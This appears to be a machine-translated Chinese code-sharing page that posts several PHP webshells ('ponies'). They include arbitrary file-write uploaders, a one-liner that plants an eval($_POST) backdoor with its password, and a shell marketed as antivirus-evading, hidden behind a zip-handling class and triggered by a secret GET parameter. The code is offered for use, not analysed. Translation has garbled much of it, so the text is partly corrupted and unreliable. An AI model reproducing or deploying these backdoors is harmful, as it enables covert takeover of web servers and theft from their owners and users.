Author: spider
I also come to a super small PHP pony.
Copy codeThe Code is as follows:
<? Php
Header ("content-Type: text/html; charset = gb2312 ");
If (get_magic_quotes_gpc () foreach ($ _ POST as $ k => $ v) $ _ POST [$ k] = stripslashes ($ v );
?>
<Form method = "POST">
Save file name: <input type = "text" name = "file" size = "60" value = "<? Echo str_replace ('\', '/' ,__ FILE _)?> ">
<Br>
<Textarea name = "text" COLS = "70" ROWS = "18"> </textarea>
<Br>
<Input type = "submit" name = "submit" value = "save">
<Form>
<? Php
If (isset ($ _ POST ['file'])
{
$ Fp = @ fopen ($ _ POST ['file'], 'wb ');
Echo @ fwrite ($ fp, $ _ POST ['text'])? 'Saved successfully! ':' Saving failed! ';
@ Fclose ($ fp );
}
?>
I read the php tutorial last night and found that php is really powerful! By the way, I wrotePhp pony
Paste the code below ..
Copy codeThe Code is as follows:
<Html>
<Title> By: SinCoder </title>
<Font color = red size = 6> php pony By: SinCoder </br> </font>
<? Echo "</br> path of the program:". _ FILE __.
"</Br> server operating system:". PHP_ OS.
"</Br> server ip Address:". gethostbyname ($ _ SERVER ["SERVER_NAME"]).
"</Br> PHP version:". PHP_VERSION;
?>
<Form action = <? Echo strrchr (_ FILE __, "\");?> Method = "post">
Data to be submitted: </br>
<Textarea type = "text" name = "data" rows = "10" cols = "30">
</Textarea>
</Br>
Save path: <input type = "text" name = "dir"/>
</Br>
<Input type = "submit" value = "submit"/>
</Form>
</Html>
<?
If (! (Isset ($ _ POST ["data"]) & isset ($ _ POST ["dir"])
Exit ();
If (strlen ($ _ POST ["data"])> 0 & strlen ($ _ POST ["dir"])> 0)
{
$ P_File = fopen ($ _ POST ["dir"], "");
If (! $ P_File)
Echo "Write failed! Try another directory! ";
Else
Echo "OK !! ";
Fputs ($ p_File, $ _ POST ["data"]);
Fclose ($ p_File );
}
Else
Echo "complete the data! ";
?>
Php: A pony Backdoor
Copy codeThe Code is as follows:
<? Fputs (fopen (jb51.php, w), <? Eval ($ _ POST [jb51]);?>)?>
After this access, the jb51.php content is generated in the current directory as <? Eval ($ _ POST [jb51]);?>)?> The password is jb51.
The latest no-kill php pony
Copy codeThe Code is as follows:
<? Php
Class zip
{
Var $ datasec, $ ctrl_dir = array ();
Var $ eof_ctrl_dir = "\ x50 \ x4b \ x05 \ x06 \ x00 \ x00 \ x00 \ x00 ";
Var $ old_offset = 0; var $ dirs = Array (".");
Function get_List ($ zip_name)
{
$ Ret = '';
$ Zip = @ fopen ($ zip_name, 'rb ');
If (! $ Zip) return (0 );
$ Centd = $ this-> ReadCentralDir ($ zip, $ zip_name );
@ Rewind ($ zip );
@ Fseek ($ zip, $ centd ['offset']);
For ($ I = 0; $ I <$ centd ['entries']; $ I ++)
{
$ Header = $ this-> ReadCentralFileHeaders ($ zip );
$ Header ['index'] = $ I; $ info ['filename'] = $ header ['filename'];
$ Info ['stored _ filename'] = $ header ['stored _ filename'];
$ Info ['SIZE'] = $ header ['SIZE']; $ info ['compressed _ size'] = $ header ['compressed _ size'];
$ Info ['crc '] = strtoupper (dechex ($ header ['crc']);
$ Info ['mtime'] = $ header ['mtime']; $ info ['comment'] = $ header ['comment'];
$ Info ['folder'] = ($ header ['external '] = 0x41FF0010 | $ header ['external'] = 16 )? 1:0;
$ Info ['index'] = $ header ['index']; $ info ['status'] = $ header ['status'];
$ Ret [] = $ info; unset ($ header );
}
Return $ ret;
}
Function Add ($ files, $ compact)
{
If (! Is_array ($ files [0]) $ files = Array ($ files );
For ($ I = 0; $ files [$ I]; $ I ++ ){
$ Fn = $ files [$ I];
If (! In_Array (dirname ($ fn [0]), $ this-> dirs ))
$ This-> add_Dir (dirname ($ fn [0]);
If (basename ($ fn [0])
$ Ret [basename ($ fn [0])] = $ this-> add_File ($ fn [1], $ fn [0], $ compact );
}
Return $ ret;
}
Function get_file ()
{
$ Data = implode ('', $ this-> datasec );
$ Ctrldir = implode ('', $ this-> ctrl_dir );
Return $ data. $ ctrldir. $ this-> eof_ctrl_dir.
Pack ('V', sizeof ($ this-> ctrl_dir). pack ('V', sizeof ($ this-> ctrl_dir )).
Pack ('V', strlen ($ ctrldir). pack ('V', strlen ($ data). "\ x00 \ x00 ";
}
Function add_dir ($ name)
{
$ Name = str_replace ("\", "/", $ name );
$ Fr = "\ x50 \ x4b \ x03 \ x04 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ";
$ Fr. = pack ("V", 0 ). pack ("V", 0 ). pack ("V", 0 ). pack ("v", strlen ($ name ));
$ Fr. = pack ("v", 0 ). $ name. pack ("V", 0 ). pack ("V", 0 ). pack ("V", 0 );
$ This-> datasec [] = $ fr;
$ New_offset = strlen (implode ("", $ this-> datasec ));
$ Cdrec = "\ x50 \ x4b \ x01 \ x02 \ x00 \ x00 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ";
$ Cdrec. = pack ("V", 0 ). pack ("V", 0 ). pack ("V", 0 ). pack ("v", strlen ($ name ));
$ Cdrec. = pack ("v", 0). pack ("v", 0). pack ("v", 0). pack ("v", 0 );
$ Ext = "\ xff ";
$ Cdrec. = pack ("V", 16). pack ("V", $ this-> old_offset). $ name;
$ This-> ctrl_dir [] = $ cdrec;
$ This-> old_offset = $ new_offset;
$ This-> dirs [] = $ name;
}
Function add_File ($ data, $ name, $ compact = 1)
{
$ Name = str_replace ('\', '/', $ name );
$ Dtime = dechex ($ this-> DosTime ());
$ Hexdtime = '\ x'. $ dtime [6]. $ dtime [7].' \ x'. $ dtime [4]. $ dtime [5]
. '\ X'. $ dtime [2]. $ dtime [3].' \ x'. $ dtime [0]. $ dtime [1];
Eval ('$ hexdtime = "'. $ hexdtime .'";');
If ($ compact)
$ Fr = "\ x50 \ x4b \ x03 \ x04 \ x14 \ x00 \ x00 \ x00 \ x08 \ x00". $ hexdtime;
Else $ fr = "\ x50 \ x4b \ x03 \ x04 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00". $ hexdtime;
$ Unc_len = strlen ($ data); $ crc = crc32 ($ data );
If ($ compact ){
$ Zdata = gzcompress ($ data); $ c_len = strlen ($ zdata );
$ Zdata = substr ($ zdata, 0, strlen ($ zdata)-4), 2 );
} Else {
$ Zdata = $ data;
}
$ C_len = strlen ($ zdata );
$ Fr. = pack ('V', $ crc). pack ('V', $ c_len). pack ('V', $ unc_len );
$ Fr. = pack ('V', strlen ($ name). pack ('V', 0). $ name. $ zdata;
$ Fr. = pack ('V', $ crc). pack ('V', $ c_len). pack ('V', $ unc_len );
$ This-> datasec [] = $ fr;
$ New_offset = strlen (implode ('', $ this-> datasec ));
If ($ compact)
$ Cdrec = "\ x50 \ x4b \ x01 \ x02 \ x00 \ x00 \ x14 \ x00 \ x00 \ x00 \ x08 \ x00 ";
Else $ cdrec = "\ x50 \ x4b \ x01 \ x02 \ x14 \ x00 \ x0a \ x00 \ x00 \ x00 \ x00 \ x00 ";
$ Cdrec. = $ hexdtime. pack ('V', $ crc). pack ('V', $ c_len). pack ('V', $ unc_len );
$ Cdrec. = pack ('V', strlen ($ name). pack ('V', 0). pack ('V', 0 );
$ Cdrec. = pack ('V', 0). pack ('V', 0). pack ('V', 32 );
$ Cdrec. = pack ('V', $ this-> old_offset );
$ This-> old_offset = $ new_offset;
$ Cdrec. = $ name;
$ This-> ctrl_dir [] = $ cdrec;
Return true;
}
Function DosTime (){
$ Timearray = getdate ();
If ($ timearray ['Year'] <1980 ){
$ Timearray ['Year'] = 1980; $ timearray ['mon'] = 1;
$ Timearray ['mday'] = 1; $ timearray ['hours'] = 0;
$ Timearray ['minutes '] = 0; $ timearray ['seconds'] = 0;
}
Return ($ timearray ['Year']-1980) <25) | ($ timearray ['mon'] <21) | ($ timearray ['mday'] <16) | ($ timearray ['hours'] <11) |
($ Timearray ['minutes '] <5) | ($ timearray ['seconds']> 1 );
}
// Decompress the entire compressed package
// Directly using Extract will cause a path problem. This function first obtains the file information from the list and creates all directories before running Extract.
Function ExtractAll ($ zn, $)
{
If (substr ($ to,-1 )! = "/") $ To. = "/";
$ Files = $ this-> get_List ($ zn );
$ Cn = count ($ files );
If (is_array ($ files ))
{
For ($ I = 0; $ I <$ cn; $ I ++)
{
If ($ files [$ I] ['folder'] = 1 ){
@ Mkdir ($ to. $ files [$ I] ['filename'], $ GLOBALS ['cfg _ dir_purview']);
@ Chmod ($ to. $ files [$ I] ['filename'], $ GLOBALS ['cfg _ dir_purview']);
}
}
}
$ This-> Extract ($ zn, $ );
}
Function Extract ($ zn, $ to, $ index = Array (-1 ))
{
$ OK = 0; $ zip = @ fopen ($ zn, 'rb ');
If (! $ Zip) return (-1 );
$ Cdir = $ this-> ReadCentralDir ($ zip, $ zn );
$ Pos_entry = $ cdir ['offset'];
If (! Is_array ($ index) {$ index = array ($ index );}
For ($ I = 0; isset ($ index [$ I]); $ I ++ ){
If (intval ($ index [$ I])! = $ Index [$ I] | $ index [$ I]> $ cdir ['entries'])
Return (-1 );
}
For ($ I = 0; $ I <$ cdir ['entries']; $ I ++)
{
@ Fseek ($ zip, $ pos_entry );
$ Header = $ this-> ReadCentralFileHeaders ($ zip );
$ Header ['index'] = $ I; $ pos_entry = ftell ($ zip );
@ Rewind ($ zip); fseek ($ zip, $ header ['offset']);
If (in_array ("-1", $ index) | in_array ($ I, $ index ))
$ Stat [$ header ['filename'] = $ this-> ExtractFile ($ header, $ to, $ zip );
}
Fclose ($ zip );
Return $ stat;
}
Function ReadFileHeader ($ zip)
{
$ Binary_data = fread ($ zip, 30 );
$ Data = unpack ('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len ', $ binary_data );
$ Header ['filename'] = fread ($ zip, $ data ['filename _ len']);
If ($ data ['extra _ len']! = 0 ){
$ Header ['extra '] = fread ($ zip, $ data ['extra _ len']);
} Else {$ header ['extra '] = '';}
$ Header ['compression'] = $ data ['compression']; $ header ['SIZE'] = $ data ['SIZE'];
$ Header ['compressed _ size'] = $ data ['compressed _ size'];
$ Header ['crc '] = $ data ['crc']; $ header ['flag'] = $ data ['flag'];
$ Header ['mdate'] = $ data ['mdate']; $ header ['mtime'] = $ data ['mtime'];
If ($ header ['mdate'] & $ header ['mtime']) {
$ Hour = ($ header ['mtime'] & 0xF800)> 11; $ minute = ($ header ['mtime'] & 0x07E0)> 5;
$ Seconde = ($ header ['mtime'] & 0x001F) * 2; $ year = ($ header ['mdate'] & 0xFE00)> 9) + 1980;
$ Month = ($ header ['mdate'] & 0x01E0)> 5; $ day = $ header ['mdate'] & 0x001F;
$ Header ['mtime'] = mktime ($ hour, $ minute, $ seconde, $ month, $ day, $ year );
} Else {$ header ['mtime'] = time ();}
$ Header ['stored _ filename'] = $ header ['filename'];
$ Header ['status'] = "OK ";
Return $ header;
}
Function ReadCentralFileHeaders ($ zip ){
$ Binary_data = fread ($ zip, 46 );
$ Header = unpack ('vchkid/vid/vversion/kernel/vflag/vcompression/vmtime/vmdate/Vcrc/kernel/Vsize/kernel/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/ voffset ', $ binary_data );
If ($ header ['filename _ len']! = 0)
$ Header ['filename'] = fread ($ zip, $ header ['filename _ len']);
Else $ header ['filename'] = '';
If ($ header ['extra _ len']! = 0)
$ Header ['extra '] = fread ($ zip, $ header ['extra _ len']);
Else $ header ['extra '] = '';
If ($ header ['comment _ len']! = 0)
$ Header ['comment'] = fread ($ zip, $ header ['comment _ len']);
Else $ header ['comment'] = '';
If ($ header ['mdate'] & $ header ['mtime'])
{
$ Hour = ($ header ['mtime'] & 0xF800)> 11;
$ Minute = ($ header ['mtime'] & 0x07E0)> 5;
$ Seconde = ($ header ['mtime'] & 0x001F) * 2;
$ Year = ($ header ['mdate'] & 0xFE00)> 9) + 1980;
$ Month = ($ header ['mdate'] & 0x01E0)> 5;
$ Day = $ header ['mdate'] & 0x001F;
$ Header ['mtime'] = mktime ($ hour, $ minute, $ seconde, $ month, $ day, $ year );
} Else {
$ Header ['mtime'] = time ();
}
$ Header ['stored _ filename'] = $ header ['filename'];
$ Header ['status'] = 'OK ';
If (substr ($ header ['filename'],-1) = '/')
$ Header ['external '] = 0x41FF0010;
Return $ header;
}
Function ReadCentralDir ($ zip, $ zip_name)
{
$ Size = filesize ($ zip_name );
If ($ size <277) $ maximum_size = $ size;
Else $ maximum_size = 277;
@ Fseek ($ zip, $ size-$ maximum_size );
$ Pos = ftell ($ zip); $ bytes = 0x00000000;
While ($ pos <$ size)
{
$ Byte = @ fread ($ zip, 1); $ bytes = ($ bytes <8) | Ord ($ byte );
If ($ bytes = 0x504b0506) {$ pos ++; break;} $ pos ++;
}
$ Data = @ unpack ('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size ', fread ($ zip, 18 ));
If ($ data ['comment _ size']! = 0) $ centd ['comment'] = fread ($ zip, $ data ['comment _ size']);
Else $ centd ['comment'] = ''; $ centd ['entries'] = $ data ['entries'];
$ Centd ['disk _ entries'] = $ data ['disk _ entries'];
$ Centd ['offset'] = $ data ['offset']; $ centd ['disk _ start'] = $ data ['disk _ start'];
$ Centd ['SIZE'] = $ data ['SIZE']; $ centd ['disk'] = $ data ['disk'];
Return $ centd;
}
Function ExtractFile ($ header, $ to, $ zip)
{
$ Header = $ this-> readfileheader ($ zip );
$ Header ['external'] = (! Isset ($ header ['external'])? 0: $ header ['external']);
If (substr ($ to,-1 )! = "/") $ To. = "/";
If (! @ Is_dir ($ to) @ mkdir ($ to, $ GLOBALS ['cfg _ dir_purview']);
If (! ($ Header ['external '] = 0x41FF0010 )&&! ($ Header ['external '] = 16 ))
{
If ($ header ['compression'] = 0)
{
$ Fp = @ fopen ($ to. $ header ['filename'], 'wb ');
If (! $ Fp) return (-1 );
$ Size = $ header ['compressed _ size'];
While ($ size! = 0)
{
$ Read_size = ($ size <2048? $ Size: 2048 );
$ Buffer = fread ($ zip, $ read_size );
$ Binary_data = pack ('A'. $ read_size, $ buffer );
@ Fwrite ($ fp, $ binary_data, $ read_size );
$ Size-= $ read_size;
}
Fclose ($ fp );
Touch ($ to. $ header ['filename'], $ header ['mtime']);
} Else {
$ Fp = @fopen($to.w.header='filename'{.'.gz ', 'wb ');
If (! $ Fp) return (-1 );
$ Binary_data = pack ('va1a1va1a1 ', 0x8b1f, Chr ($ header ['compression']),
Chr (0x00), time (), Chr (0x00), Chr (3 ));
Fwrite ($ fp, $ binary_data, 10 );
$ Size = $ header ['compressed _ size'];
While ($ size! = 0)
{
$ Read_size = ($ size <1024? $ Size: 1024 );
$ Buffer = fread ($ zip, $ read_size );
$ Binary_data = pack ('A'. $ read_size, $ buffer );
@ Fwrite ($ fp, $ binary_data, $ read_size );
$ Size-= $ read_size;
}
$ Binary_data = pack ('vv ', $ header ['crc'], $ header ['SIZE']);
Fwrite ($ fp, $ binary_data, 8); fclose ($ fp );
$ Gzp = @gzopen({to.w.header='filename'{.'.gz ', 'rb') or die ("Cette archive est compress ");
If (! $ Gzp) return (-2 );
$ Fp = @ fopen ($ to. $ header ['filename'], 'wb ');
If (! $ Fp) return (-1 );
$ Size = $ header ['SIZE'];
While ($ size! = 0)
{
$ Read_size = ($ size <2048? $ Size: 2048 );
$ Buffer = gzread ($ gzp, $ read_size );
$ Binary_data = pack ('A'. $ read_size, $ buffer );
@ Fwrite ($ fp, $ binary_data, $ read_size );
$ Size-= $ read_size;
}
Fclose ($ fp); gzclose ($ gzp );
Touch ($ to. $ header ['filename'], $ header ['mtime']);
@ Unlink(%to.%header%'filename'%.'.gz ');
}}
Return true;
}
}
If ($ _ GET ['zxzgcn'] = 'login '){
Header ("content-Type: text/html; charset = gb2312 ");
If (get_magic_quotes_gpc () foreach ($ _ POST as $ k => $ v) $ _ POST [$ k] = stripslashes ($ v );
?>
<Form method = "POST">
Save to: <input type = "text" name = "file" size = "60" value = "<? Echo str_replace ('\', '/' ,__ FILE _)?> ">
<Br>
<Textarea name = "text" COLS = "70" ROWS = "18"> </textarea>
<Br>
<Input type = "submit" name = "submit" value = "save">
<Form>
<? Php
If (isset ($ _ POST ['file'])
{
$ Fp = @ fopen ($ _ POST ['file'], 'wb ');
Echo @ fwrite ($ fp, $ _ POST ['text'])? 'Succed! ': 'Faled! ';
@ Fclose ($ fp );
}
}
?>
Usage xxx. php? Zxzgcn = login